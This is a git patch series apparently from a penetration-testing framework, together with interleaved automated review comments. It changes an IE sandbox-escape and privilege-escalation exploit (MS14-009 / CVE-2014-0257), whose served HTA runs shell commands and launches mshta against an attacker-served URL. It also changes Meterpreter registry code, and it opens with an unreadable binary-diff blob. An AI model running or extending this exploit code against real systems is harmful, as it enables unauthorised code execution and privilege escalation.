zNcrfcKan(teA%~zB=AAYt@tip{xeB*9A2?aWGF`_H1Tva7J$M_`mnGJGCW<4tFE{L zs}Q-0Zl9-P|66nguUHjI&htxFO(vy$_Nw_-aU^|GszElJDwckCTf$&k=DO}K+rm=q zOcY&heI`yY(faS0q6HJJ^Nz_ZnBw}I(gc&apUG;;5^M?mY?ea7l-S=?CYX}?n`#78 za(`2kU`pw4>Jm(r{w6;i?NORwvi9~eOt7W*PsRzRjDDswnNTco)PARz79mwuzf_hy z!Ia(KR4SMb_BYiECTm`QTeD!x?{Df7OojbTVm)ntaeq^gU@Gcw3KvYL`kOexRMOvM zjTLOA{cS0NsjR;#Q!thHH{}VYivFfkg6Vue)0rwLmU3#pGhz)ws%m#Ces=P>(b4cb zvn#Ny&v&t415ZH_7HqNOaPlAz+=ouA562bfGQOSs_v`N^wGK_nKtj?Tvo;JRB#U3R z(Tww<Y~u!e558|QiE?P~yD1W#eA5w;YVpEBaAMo{SfKmU9~R+CAlYe!Qn)jo-V(mZ z7#>oB3fEvWpi8hU7std^dKum&uA7~d%-^%CQj~T-|IV%$q?YV9jAYi}_K9XTAQujj z;g%p6=pGXo%UgDbO6p;6Sh~!m3ZnfCOyM8d{S=Ne{hnj-E!aVrj1d+}=fQBiAw&Vb zLSLzAx$|cwZaF2P7`S|VIp4#swj618&9V$UilcN#jmuT%8J0&Ar0_wR^HFX}=98kv zT;6MMG&(<T@AQfEP}KTl{Gj`5#~haikFuS#wbXjV2d_YcX4zCJe97La!_U)_N@-P> zZo6E|ms_f-p^9(Y8!v4{4#nGN!p_oe`k#2i_QsW*@l<23q^4LpbNPk)3UShYy^kl& z{O<ez3}~WN#I)sfyE5X?uUO1$GoO=Hf*mhx{|eILu<jq>F`*5qY%$%6n64vu;0nxy zDx(3jJ3wFQ;Z)`?XV1Z8dmm7cL_YGs`1y&5#y|{M?3`4ImMT8OoxOt=b>+tay+K9I z%GGP=Biqttmp!dS@;d$caiGl`jlm@|=c=df){dKNR`W*>go=fSD~n{N<D&zeA|i3r z9`q!`l$gm?S5C8TM7R;of04_QZr=aUFw(_OICKuz#_NZ+(XD=V-qXbF=*SBa1#}AS z^FK&$js-DJGoGA^96`2?)Jv`T69_i{X9`$+e^Q_&Y5YA8Mc~``&_q#`-ErSTfkgD3 zoqyoid{N;c$GgWABI3!rj*lXYW7NY&f+0xaHKHCVe}Z2HIJ)>|LizrQp_KeLCx1Yi z_w9?QGPXFI#+4RF5K+Y;{=-MU7BwGoTzvEl5p^GOtUSdM9BlcI?-F52iAqv@f(~QK zF%VlyY~JL&<IiV0z2H_qly4Z4h!|&P6P{yL$rWy2Ui;z%Jgelr812(`0Y^S=T_3%e z6i~CCNHTn*a=M4_xT&aFb;aiSRxLm4EWMIHe^%}vhq1Z*7v8d90!Lbk_#e+|NG(6^ zTsUdq<IZUUnz!H$tTT2hy_@;{xGc5H71+ev&n=+6`Tkro&cN7;?4b$52xnla1(}!9 zV?8j*@ma-LB9esiwwGVP8LM$bVGU$D#$lzNa?~Qc_IwiCy&7I}?Z}db(>(}zyrFB{ zAGY}&Kiiz7oD{K`nTZ(NAe!jMFNB4{|8#z<sB<;H>OwglEVf@9!H>HbFNB`O^>Rez zPWW>{<z-TGCa#LiZ`evCH{QPS_vbfm)ZF;0WmGlv$G&WRq6#mFn4NVkgIZwt@%7KW zYX6n+d|yKP46yr&mO)Jp`zzPTh@joL7_|ETC{oneUTeUsm(4W;{4Z8>9Dm@_bkWQ2 zJ6^uz<&CaYy)gyfZEs8@DGt9kXM2ubaFvk+)Z#V>c^vXH<S(kf#YlEub);YQ^T0^% ze_KTo9FDg|KBD5od}ZSb^k&Gld7}Co{OW7#MU6N3E7u;RnDgN*QPp8S|HE`*as2(^ 
zcmjVN*EC<$eAtoRR1KeWOuc^D8#CO|q98@Q^z%?_5t@#tcDgFNb6x%i7vn{ar5r{q zP<p|judYn6nOz@Qs;K!)Z6(b?<EX7(u+{&=)*{#%`rFPlLBpC3uyo%o8~F#GX+(r= zzta_%#lQRcbP0XHO!fHj+tY%5REop*i<ur+>+xUZ4ip9TIGQ@zyr-#uXC!%$uOUPK zU?drkTM)@D3>#z#<O1Y*i1il#-EZ#@DgRPekR*H$CU%hS&0XX1_BPbQ@;ADqgme6- zYoEj?8#TMe=iBf1A`z?v+fe(S87@~ryttk7r>~f*b6Sc2L7XzUv{v7?#aFdUVaL0s z*7o84_D{Ts%&Mokh9Ot~mq7>@#5c6p52l4RwbxJzufy6e2toSlxBdCM)(?i$g!S!q z!9-tRw#T8O0#q0fMA_J$MWf=Y+m(X7rM-t{DTuPtw8w?)E$!`~Eg?)?Fw@U=ltYZ7 z-nnipZ1cJiN<^qCk2cqWccTq>S~lBaI?c|V0m4hmD|Za*`V75A&Fet!V46EN8@VUb z+zk!xiYEHm=CvZaClt|HG}_M{O-Df7UO$Moy1CtKH~5g@)-tFVy_)vv{aQM&0{LG+ ze%rhrgih0vnrKNcnfi~ayLtFc$uYFIy?xDVL$1v<SI`0Ey1zG<(6_H)UVf!-Osw-d zk#q)4nn{x`{8t4SjF<nBVO|%~-$T=v()6MKOy9r$4k;2f(nLMRyOSV{+%+0ig2#~d z&0itzuAkI-)jUlkad<`Ie(<dGs{NN<->1LwDSl{duNmWVz0yWQvSA3(A0OLqQ`?y` zghEiyEA;2a_8(y5UlRRhU2v2zdI$>{3mFFShTJ|vm`=zSkW}ck;E-dmKSY?HAzwfm zA(tUe#P>i3+X#an)|g0$8L|<Q3CV*LLn<KkkXFdA5OF@SG9med;ULkFrI2-yt&n|? zlaTX}T1W?kDIkm=Bp4D7kwc;(i4Y59HzXhO1mrBF8uB5e1LBQ_N+FSuILK1Sx`)Q0 zG6Wug6hcZN6%hKtTeWQb3YYC~A3u;xAAA`d%!51%IeXN;ZXl6cFPa$1j|Gfm>Ip_t z@r>{*w2<|)B1Uqk9j|9#7YzNr`hNDtA<ArmRO~~Q^wm2)eQ|U<!Aol<<bJ}0tR+mc zVc?g?5=KfM+8}18Ou06Ky`M-nPiL%>Sz1Q2Zf%NmZCcv4^=mUWZQIH)S%@s0&Iob! 
z{lY<6ckOBWi6m+wBPl`$sMJKDv5;0sVsBhJ;#;TuGcNoAcfM@InIo+Kj4bbslupGv z2S^E(-a=iyAN*Fp6iy_PO0X29y{rJ~kMlL)^I#MBP%jsOH2rTlTRXt6Uj9yLg@KMQ zO`rj3K`EFvTEKDW-QYlstY0{hq(hg2W{_4)hhGVOVy~SJIV}h8A%$}2gqRVJmz6^P z`+FG*T3~Mitu&C+8}S`lL<_(hS0)Q~{9eHnf_Q_<RDhTnp$BVw8~6><*TRl>+(LS& zLW4&4ru!Jz4w@go-3s}nAT6KXMw(&A59L-Ng8tzGjTnWlbRYur$}p3NWCkb!O<*{v z0%O4upaqNpv%q+;5S$H`f*P<291S*u3&A!}33h`4pky+UOqghehawOQ0}F<O(I5vV zg7<<Ja3+`qMuYj_EbtUK2dn@i!5VNb*aWJ<HqZcefjZD{3Lb?(yhxYCfgGr?A`p!L z`YU`k;yVd?3YZ1r6(N%kZU;+2AFv9fbJz&dp?89q5vB{YfZ_-uk%9qWDkuf-1C`)r zFab;hEufXYI;L~G1<ZnhwuCz0B#=5E^@UTgQy-vChhO}e^Ux=N)Z4>BGxAg4sD+)b zf@W|s*a6bH_nhjUb2{Y1pi^hY+%w@*iB&?E6I~Y6**GNJ3C4mMU?R8+w1B(8OmGjF z5Bh?qz`bAvh=CNmIuopdz7K2!sn@rF_(Kt4^<;sa(CMo1oQ8`6b-oHTpl>-*FP2Vo zuWJ^}h8_j(2hHFEU@}OT8(k#_z;x)FK)M>}GR=lgmtQgXAXowBgY{r8*b3t3FQ$;L z|3e6Lz;GDs0qODym`)^NU<8Ptt%PMX7L0=qpJkH4BVZ<I1M|S6U@?eayqQuEf6pN- zvoT;T^c`Rmco6IY^FZQRdEy@8;~TtR?%wAUpCghoNCmdqT8?hP_KPEldPr0>BYEv! zysm|PtC`v>Z;vFmeXZg1-9yKMbm%ycF7POj&aD}wW1R?6?@b1&Q&~Xjwdo+8OT0f2 zdYTQ=q0Iw@Ap)tF7lU+XD*>sKmVt0eD^r00_2Md!&Secq_vCtzI#nY`y{;LgL(&RT zuXKVq9GOm#dUZEQodkc`C3vS8q*EaQ=@15iQcw!g<rfZ)Mg0tmz&IE<kj_~YI3A1z z=`t~c)H@SFx~!5xx;!l46fhl(05d^6b~4%EbTAK8gM}bH8;U^=ECID(8EB-=P=SC6 ztOBFJ8gK?!56%J`!Dz4<oDH^ub3i9J7wiP*f!*MIkclUf1%Md57nFczFbG@<O2K7d zIA~pg0E@r|kfR1LaUa|tP7noM1jd0LU?S)Vrhr~xI_M2%fj(d!C<cqb0bmI@5G)7% zz$$PMSPRm>dTETu2I7xE3k=ljoZvlR7dQlD7QiP!KQI6c0t3M?a2UvfL7*NS0mg#C zU;;Q2Oa?>1G;kD{362I2f@8qK1=v8O2%Lf;6f6VBg6F|;U=0`sHh|;7W^e-722KP! 
z!AW2bI2jb*3!eZ3zz9$ZP6at|Iv5SgK{KcXldK4+5U_x1Fay+p*&qkzgIcf{j08(T z9asSx!D`S1)`L-C6F38G1!sXBU^M7y#&HWuK>FuiA>bU)8jiqR1eD-BFbbRx#({BQ zBDerd0q+IVK{J>IE&}twrC<@b3@iaxfEC~dum;==HiBtjD|i6x0ErmuuNwhR>?ocK z;Y6SW8~}!ZzF;`$2P#3j^F)C|!8kAgOazC4DPS;|4vqrzzzDDi)Pd!o5v&4dfwkaf zG2Fcc0fH^71M~#DK_Ad_5gGzYKwmHf^aI1eU{DF_z&LO-m<ZCFfCcmfGe93O8yo=U zgT7!f=m(a9!Bzw+5YU0uAi>tx0D6MWpbyvv4gfnrU$6)C1I3F`02l!3zzC3Fi`0Vy zz*x{1OaT4BWH1;^19c$Yso-@2_RJy#27o1?FIWx+gH@moYy^oEa|aFpJ3wEso5q8l z35X9vL%;!`6!ZlnKpn`@_;56c#)Ano9!yTa`X>=+5sd&dX#{u>BrMh^wS%Xq9W0}E zC6*_(gEiC+Hc&f<5u-ZTMs+<#jOt(y)uS+COQ3@Rl+kGD60CpUShSQH;?Pn`GuA2S znT2%<27}2U-4$mt?)@BXWGt|42g7mj089q-W-uH46wC)-0*k>CuoOH7R)8OX)!@f; zyRApyL$C>a4r~Qq0Xx82up4XvJ(s%A0}0pwJp_Cm3<vAMOzi*kfKoz#42%OegB<Mi z#7lv`9%RvAdb>%7ZpA1tSqRYUQ65+ca!5e0Qzg)2Kr?htupBx)c&fm|U?S}Fj!+97 zgDBh$=v|=^`cq&FcpP+s^q}ej9U!xeNL~PN-dKf`&JP9~3>FmV1BO7SCt5mmF&Ga0 z45$R(1EaulFb;ehOavbWQ@~fjbnq=O3p@|zf!Dzzun{Z)=Y!?TF#k0ORKf5On28Dp zfVI%CfsNqjU<>#O=mg&ZyTA(|lSm|Q0DfQ-7zCDrVc?4(3w{aeK^}|+TfqeI5}0g7 z;C%$rz^}ke@H6lr_yt%9-T+U5SHW1!<v6emIz6)KWrJQu&O=WFlcCc~OAT}jjYo%k z!3OAYU<u-<fz8l&g4R4F7>Ga{3`Jlk_%zr9o(09r@q7jbfEPh2SWSr|+6YEK&jaaY zL<4frsZ$rCTt6@xI=zgPA)elf%+NEyPQ+smvNB09oP)sv(#uFOA_jpO(C-D)kue<1 zhMo$BLmva?LthKh3*}(27&=z2aIy3UOQD|tE5L=6NJrOcHS|SbG0K@r?|=0$?0}&P z1{v4{JriWm!$_bN`h#E<3b+TP*CrF#0s9fK2V4x+Aio?GuW&!rBtjn#JplTBpc#4? 
zD22Wei~t{^LzRb!DIf>K7BCvj0fSJH0W?ED1d5^Sz$EAg!3yMKK@0T9!3=N@m<{d% z^T8z`y-^PVi=m$cOTh%N0<_u@s7HdKU^NT{U@Hn%Q#<qrz(&LefKAYsg3Zta!B*(Y zzz(n&><05e@k%0j5)1;%Kzd~#28KgV1f9@_gUXdy|H~1eH&i_sg#@`^9QZ7l2<`?` zz*As1GL8V#p|1p^(9p497W5P_54;Q(gIB;ZumY?CtH65jU9cIf1DQCi|6tGwLlQ{$ z`ES53=x>64NksA*7zREA>cK}qF)AJjCP04_Oa@nh^{^|zH0b+4db5rKGoc>^=~bNr z^Pp#g-BuX12o%9^0F*!v0ZX8-2Ft;%U=Zx1z$)l#z-H(wuoik2$U>KbjnLPDQs|?> z7U;>;4qXX4p+5mKtK5&)3oVG42t5dfO<)+f4P-$NFbez{G=qg;5_lT4fG>j?;PYTM zI2+8bl&OeMz#w{sr&l_9g-@xBnM;m&S~FAJ+j%occUg9WdvnSI>C$Wjg%!5Z?XY<u z^~**u2n@f^J^jU?Fl!*4g+z;c(CR_j>3~h{Eg}(=LYJlr2cVqELxB2AW}176w}N}2 zGh5u#6$17^<v<r0Rhheh?DVx}q+_}ud5|JV38WlS1*wNLL0TYfkWNSs<z94lJ30ml zf`mY%kT6I%Bm%-hl#nP$5R02S7z+tOI1V&J61Ec$N#b^U>T<H$S_4A^qzTdr>4tdj zKxPOBNrYrViXl~y7DzWFWG5CFBn6TUDTEY3PC?2cjgV$Y8>9;&$w1>EiI8ka8KfzL zOqO&a5U>lCK~f-v5Zcpnum;jXb%><$zzXt#w{JYNoLRywV&WM4g0*DW&{<3*lf*2; zd*`i83bT#b!|b&0Sxb%+#_qL_d~fewN3z7(VeXe1m6_{_o&-_XShP5LasA?>=TnwG zH0!Xwtm@p`A9UIqQi#H5>Xx-TGdAq7yHZGK<(LiRw8wIKO}mEkU4#=a3L9MG4Tkw~ z5MH_uCd@6!On<!4hP(v12^op&(0oWb#3o#gP-DN(STBAAfv&WNZX#m_wGM(8!Q=%~ zvS3mL4R+rFB_K^H14W<~q^oEKNVCv`sRnxvO;c_^y@?F9(jYzW=ov=CTsC|UpKN4- zDtxFtueZp;-Xb6C)t~9*OQ1K>y#o4xwY_Wr>0)aF=}n-emu(;p=t;~k2*7^lbMP7X z4;s)F!U%1q{YXQjj)w-=vr~y!D)o1_PzKUY(F7$(KwDV>p4?0V?A56xL|O|i3f8{Q zxiRh{Jz?nXSLD<}6h#wdgF<IPTI_SZRnRfi<A*C6mtdc<nT*l5B8rX^EW(FI(JYh} zB#i?5K8fSp_0qUgi0kW$L?Ur_fkxE#iwKPBji4><LIf>2z`ihz%!=1Pcz3*LyJ+4x z*rLF`&$`LXKlJg?X<SXOXQv@O&6i>SDvgXBojuJRy%Il~&}1curZtv>U5D+#TS)ML zUwYGY*h9CFp{vLDCf(S}E+nO`@x<Rx*9+O)t@Oie(jxnYir&e5|CN_T9-24mPG0+2 zR4Iy@ZhvPB87;Ca>_0&Fo~~jfb5(ZVtz<L_v=7)y#)za*_IXgb&?I-uzgvmF(1qYH zfP|T;=w+YYw9uU{9F#-sjax{7ckFT;e9LKN!NW%3?c@YV6dKg`Ik3q7!&WjjFbzLY z_IX?u!gL7p?V;Pql(8PD)CWSdtVedrE+nDD$m9ycxOE%)6l-?(DQb<-57FP-glfIT zdl^aCULj6$B<pSmP9RJh88rCM{dcY62kgdll(z3d`-*go(6U^2X+;HY>W>S<BC34Y zU0c`*xBh*xJ$O4AEfJk@w~#ij;VIN$-b#YTUhcK_4OacX2G9Dm&{nUx&*4v|?FY7# zk=~vc@mJ6n1@nZ)3;45K2raa)i0Xe8k^Y*yA!ly58@A~)p+PGPK6mE}dG>$0%X+*= 
zPR^ra?f&e;?~jZWzZv2O*}hLBZ01n>*xJwbDQx(EG{-{&|Nn2i|8KwXR?0KT`(AvF zC__{;tx~j)T*eD31)N&tc5Hj+R&2Gc4-lob822xFK|BT0yHN>9??$EI7_c0qcd7GW zC|C{BBc~Rm$4>)DPp2l3dQb~U54bjv-l;mkAz&vc1-n4Hmvn=8eq6^e_^T)SP#^~B z4ORk<0E0k!sgr`jB@Uzy11v}%0yuCi7zK_4qrosR7Nn0)ao_|nq4IYt;k{zGHMq(^ zq9D<bSV$bi3`u|_K~f-TkW9!yNIs+(atcxcDYd_rOD38d5p039LCPQ<kS<6M#4{P= z011MGL0E_q!a<@TiI6_`PeC{hV%HxcL8HnMs)jT`S|ME!&$TECBDHTnM5fQkL+})& z48lRqLuw!mkQPWMgjt8179<?PLO4hqBm+`nZ$Cur66y+h8eB8A;A8Yy3-Y21-?Q?? z!{o5Xw5atM9!N(U^M4_g>uhAT=RF6<qI`%2f?>!0dhHk)N%HMK9mD^9&$kaM6fo6| z_(C!q#tqO$<;&bTrkQ3eU9*1MmNgr8?AW#=D#~5T=|VCEDc^JB&q6W|+Nk5S=t}Kz zGQz`puV$I%kfvC3QB$pH(0r)*UGtY_0hhp~aC^Cv-1FQe?JrtYWNhTak@m><BPZ%s z>dxqL^|$py4HFG=gTb)Tu-kCO@UCIJ@sjbn(P^}puA9C!F;XlFG+`JU&+cU3V@Jrw z$TrG$$)1sYF7uGDl0PRuC;vk(R?M_2<|#HPK2fwO#w!;oElQj6jIv(&mGU0d2-R%W z64g_xKUALTGW9oVM&qlA(`?rq&`3Fj)}WoEJ*h3zMn%4-`&+k9A8Lp<R2%9IKNyA^ z=NMNR(~UMX=L@6D7;I9R%%)YQou=1J@0va~{b^!YyzGJ-d9V{%tBjq&&S5vR+u0Y{ z*Vzx)7Pf=!W_@JCWnr=inOtU+nPuB#)8u;jY<YtGlKeM$w_K!9E9NVfDAp)S6c-g= zD*mG|D>o>u%CD6YRjw*u^`z<()#s{jRPCx?RKKfwR32(y^*!n!^%(U8^)$6wZB)-w zFIFe2SF0^n^$zue>W9@&sb5fkrFN=stHqjg8aZd?c5r!I12<p0Q~Q|qIqeeNPF=o^ z*FB~y(Ut1Tbk}sZbb<O1y;L8j57$TNS-n!v=^xbR>GSo4`Xc>*^j-!jrYOR|8kB}5 z2CLyELls7-#!!n<YA`e!nhc|jVMc4XF~Z0iPnu4d>P!u$YbK|Of$ub8?qn>-MzIy_ z1@<!g4o1dX<|i91dr<bCEF9x-MgA#9B2rPS_+F8yT&-NEyid7Bxm~$OdB5_2GFN$2 zS*R>hKB{~|S*k2ko>jiA{6;wtllm5>vPbQq8K{wH0yIHZ%?!<bnp{o3rchG^H$0^& z(UfY+G{0)PH9Z=J^W;*wU0fk&=T31YTq*Y!_X`)Q4cA6!S*=pbY4zGDZM60wZIQNE zdrDiPb?D0U_4*M8nL%wRHC`~*n9vh5o>qZGb_2VcJ;^4?A634pu2+Ako~*IH!zF58 z&{}jS4Cmp+pBly*O~x4Gy~Yj3OyfgFyYY<itnp)`w`sH~&a}|9+hj8xH=TwXwbO!= zu|vX<MzG(pH`yVwJ+fP}@8rCq45RX`B21}OCMY+;FQVYeOI52?DXN{S{i+<*!>Uto z?DMM2s#>e+OE^ilih+AfQOndCIL91yoO+RZg?f#8gL(`6BU7EN&Q;sgyt-KZg!&nH z%1i23)R)z@>IU^S^(X2t)otn@)W524ssC1cVU<WUL7GvTahfR_R-@J!HM2BxH48OM zH7hkKnoXK*nmw8<&4Zewnq!(18tdblr!d?VnhTmsnk$-m&HI|`n$I*}Y1%bEYq~H6 zg!AG2xd1Mh8_P}PrgADSl8fSExp;0dw~|ZdHga3Jo!Bc5aECY>SHwNSJ;^=Gy~thS 
z-sT#)&$;io_{c8ZDE(}Gf_{bmq~2^;XL!o+qTzKo;6>vfRwFU_nC>%eF%n_e+p zro)<!4G_4+-e!-=7s0J^l#eJ+E4wr;-1poqZj$y<ZMpWccAM@OT?mRz(m$<#UH_Z@ zPyJYINJ|WB4e5pxhEELPM!7M;xXqYne8l)7eBrXO&e(4J)!1#kZ45C@GRaKwChKz3 z8dIt%({unc`<SW3^t9=s>5{M#zA$}b>M}9eIEK-fDXfB>%`Rk@vK!eQ>>l<(HlKZp zy~3`S?UNmr@v<|r=VY(SZpeO-{V8+FeC1Q+a=B4HOTJEiTwW}H2K(LD@>}x1<toJt z#R2RaA1gW)Dy7b<oT;=cKfu<ZP_2h+Jg0g^^}ecE^@XZU^@C~wwux`B7A9fX_j0-1 zajbzCxNBSo*UkB8CE8KiIBkM<gZ2^a>)MaBUub{U{-zxqIW$rhxggRO`CX)5_lIth z{&W2}gVwME1OAiYHb!N-QEfCBml#uwTaDKHjk(4X*th96iEb9+{T=W$Tg`T{1F#E9 zW%Fep%KnlC%16n=<tF)Zd4@boepG%;{)D^%J({LSQS4FpD0SEYUQ~XebSi&Vid2JD z(^Rq8zEf0NRoSXzs*|c`RToq>s(RJOaCk55fwSP`>FUR=>bKy-E$Cq~w-3D=r?qQ` zM=pt69hnvRbL1u654zuUbM=e#(+!c>;ny0*VY}i?GfYegp5xHashEmvwu}|Yv@%w{ zRK8Z8Bfl;W!1laWaaci=MrABErdO1|D~G6Lsvof(OVk(CSJa=Xzf}il_G+wjA(X=N zn>AnK<n!W&a3LHE&tA)2<=%z={>Axg1GR~!bEaQSOa<O@qSA8N7WpjIT-Cj*bE;R- ztM642YB`qfM)fgl<S(mlst0I>YNliH={55-X3Yl8ZY;PX*y3KmI{QZRhb9Kw+Ou4^ zHqxs7CbB*9_s9rcw60KhQuh>g_D^)*=$yKrbieBU(k;+0)<3Mb>r3F{XY~$!jeZn% z^_hk^!zIHeW1}(C)Iq1MM%d(-7ua%HH8$vvW#7vFkOj-9$(P7W<n@YHg+#enbCSC! za(JX6a#rMq$jy;M^e-DP8m+HlS-feyYJA7|zVV#tRnyz<ovjhShM?SFc0GHRZIKO; zyW}GjQxpcpy%^Y?id=<V@toq4;ys*xH&OUlrBXRtnWzlZs&O=@Xt!&3YY%FxwV{zy zBcG0ZJ+eOXhe&UoS(l{C(LJIo*S)X%SQn~S>GxW3W)<j9=`ZQu$E9K<{B(gK(U5N} z!<Ngm;sp#E@iY6dj8P0!4OIoH^s4!ADJzcI<Eqnes*9@ERPU)iQr%E}g=zQ+^ZS>I zs0XNrs7I(n)sxkFbpm$M_3BOPo$3eFZ>VozpVVk>X@a$(+QT?AtmWF5wUyc{+Q`Tx zU5d`n@Py%c180mf#u--{zsE+QGL@T{PTYvmkoVc^>;rO%B1G}L;$_8U^nSTAUHQCH zu6h_pQ_%l7j`jK|eKed`Vwhy$49gA24L=*`s|$KlpUlnFHyJ*)7<`Nt<1kZ#X@}`O z{6!}Iz!i}m>{NCYwwTA+m)VQ#o9tEgLsZ>@W2Te+59=wT4}xVlcr3CsS-LDkmMP1U zWy=oA3S~vIV%aHKnXFt^Ars5}<Pv!pmTiQbwVR$Gv+Vdku1oDLPY|R1iDw9BU-TqN zq1SvCf6NQy$?|&(D3O)QT4b%VHknh_A?wh0>Fq5~l6ulq`E&{KA|7I;r1Hhn<Sjy< zQp`knj14zMm{^n2#3bV{cVVtoG$`zaXUJr+)7W9`G<F&7m(P%+B*;Fulo)(cv=(h? 
zWSRX$DS6HsWa3QGrW8|}DZ`XyI%q1yVNh+VH8q)9Ol@%SE>jP6^K8O&1D>oO8^DIJ zVQd7eXQNp&o6csk2eBj9u#Fg|9t@G6EC72~xGYwdf&t2wm0(C3WX<SPn4FWx$`j?u za*I4&o+;0l7g^<}<fZa5d4;?dn_8>fDeuJPrbo^w#F*?bMTA1B;1qgAv?5WFsVGtu zE2<RDif#p?^i)cf;mQbQH1?Sk++Q=5r*Pe=P_`&ru@!bIyOljkPxvjTN>pX2GF8Q@ zQfwFvDyK@U4p+yjE$TenZl(3=CUvJ;qKUwf9futwO_Pq@qC(TC>BL3IkE^siLy8HW HNhAIbcuhyq diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 6b1193acfe..2e515e13fc 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer include Msf::Post::Windows::Priv + include Msf::Post::File def initialize(info={}) super( update_info( info, @@ -68,6 +69,10 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, "Not running at Low Integrity") end + unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") + fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found") + end + begin Timeout.timeout(datastore['DELAY']) { super } rescue Timeout::Error @@ -78,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Local exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta" session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri) - temp = session.sys.config.getenv('TEMP') + temp = get_env('TEMP') print_status("Loading Exploit Library...") @@ -101,7 +106,6 @@ var shell = new ActiveXObject("WScript.Shell"); shell.Run(command); </script> eos - print_status(hta) send_response(cli, hta, {'Content-Type'=>'application/hta'}) else send_not_found(cli) From c1368dbb4c37262fa69b5b0254c0c2c54d14e8fd Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 09:06:41 -0500 Subject: [PATCH 424/853] Use %windir% --- .../IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp index aa7ce2ffac..69dc7c57bb 100755 --- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp @@ -90,11 +90,11 @@ template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vecto return retObj; } -bstr_t GetExploitUrl() +bstr_t GetEnv(LPWSTR env) { WCHAR buf[MAX_ENV]; - GetEnvironmentVariable(L"MYURL", buf, MAX_ENV); + GetEnvironmentVariable(env, buf, MAX_ENV); return buf; } @@ -119,7 +119,7 @@ void DoDfsvcExploit() PROCESS_INFORMATION procInfo = { 0 }; // Start dfsvc (because we can due to the ElevationPolicy) - if (CreateProcess(L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline, + if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline, nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo)) { CloseHandle(procInfo.hProcess); @@ -166,7 +166,7 @@ void DoDfsvcExploit() std::vector<variant_t> startArgs; startArgs.push_back(L"mshta"); - startArgs.push_back(GetExploitUrl()); + startArgs.push_back(GetEnv(L"MYURL")); ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs); } From e2cc2fece00e0294465346ea2e0693636bb76974 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Fri, 30 May 2014 10:51:36 -0400 Subject: [PATCH 425/853] Pymeterpreter update win reg functions for python v3 --- data/meterpreter/ext_server_stdapi.py | 37 ++++++++++++++++++--------- 1 file changed, 25 insertions(+), 12 deletions(-) 
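Review bot: `GetEnv` returns `buf` without checking the result of `GetEnvironmentVariable`, so when the variable is unset or longer than `MAX_ENV` it converts an uninitialised stack buffer to a `bstr_t`. This commit now feeds that value into the `CreateProcess` path as well as the URL argument. Zero-initialise the buffer and check the length: `WCHAR buf[MAX_ENV] = { 0 };` and `DWORD n = GetEnvironmentVariable(env, buf, MAX_ENV); if (n == 0 || n >= MAX_ENV) return L"";`. The parameter should also be `LPCWSTR`, since both call sites pass string literals. `DoDfsvcExploit` starts and ends outside the hunks.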
diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index 41b07b142c..3155e788da 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -48,6 +48,12 @@ try: except ImportError: has_winreg = False +try: + import winreg + has_winreg = True +except ImportError: + has_winreg = (has_winreg or False) + if sys.version_info[0] < 3: is_str = lambda obj: issubclass(obj.__class__, str) is_bytes = lambda obj: issubclass(obj.__class__, str) @@ -1271,9 +1277,10 @@ def stdapi_registry_close_key(request, response): def stdapi_registry_create_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) res_key = ctypes.c_void_p() - if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: + if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_HKEY, res_key.value) return ERROR_SUCCESS, response return ERROR_FAILURE, response 
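Review bot: The key and value names are encoded as UTF-8 and then passed to the ANSI entry points (`RegCreateKeyExA` here; `SHDeleteKeyA`, `RegDeleteKeyA`, `RegDeleteValueA` and `RegOpenKeyExA` in the later hunks). Those functions interpret the bytes in the process code page, so a non-ASCII name will address a different key or value than the one requested. The wide variants avoid the mismatch, e.g. `base_key = ctypes.create_unicode_buffer(base_key)` with `RegCreateKeyExW`; how that behaves under Python 2 should be confirmed. The context of the first hunk shows a `sys.version_info[0] < 3` branch, so also confirm that `bytes(base_key, 'UTF-8')` is valid there, since the builtin Python 2 `str` rejects a second argument unless the file rebinds `bytes`. The same conversion is repeated in four functions and would read better as one small helper.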
